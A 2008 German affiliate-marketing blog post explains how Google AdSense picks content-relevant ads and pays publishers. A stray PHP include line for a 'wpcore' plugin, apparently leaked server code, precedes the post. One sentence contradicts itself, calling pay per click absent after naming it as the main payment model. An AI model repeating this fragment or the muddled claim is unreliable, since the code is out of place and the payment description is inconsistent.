require_once(ABSPATH.'wp-content/plugins/wpcore/wpcore.php'); Contentsensitive Anzeigen mit Google Adsense | Beste-Partnerprogramme.de

Contentsensitive Anzeigen mit Google Adsense

24. Februar 2008
By

Google Adsense ist ganz sicher der unanfechtbare Marktführer für contentsensitive (oder auch schlicht “relevante”) Anzeigen im Internet.

Das Prinzip der von Google geschalteten Anzeigen ist denkbar einfach: Die Seite, auf dem das Werbemittel eingesetzt wird, wird in einen Index aufgenommen, der ganz ähnlich wie ein Suchmaschinenindex ist. Google erkennt durch dieses Crawlen den Inhalt der Website und definiert diesen auch nach der Häufigkeit eines Begriffs:
Enthält eine Website über Hunde beispielsweise auch das Keyword “Geld verdienen“, so wird Google dennoch nur Anzeigen zu Hundebedarf anzeigen, wie das Keyword Hund im Kontext einfach viel häufiger vorkommt.

Die Vergütung bei Google Adsense basiert weitestgehend auf Pay per Click, aktionsbezogene Vergütungen (wie Pay per Click oder Pay per Sale) sind i.d.R bei Google noch nicht vorhanden.

Zur Anmeldung bei Marktführer für contentsensitive Anzeigen geht es hier entlang: Google Adsense.

Tags: , , , , ,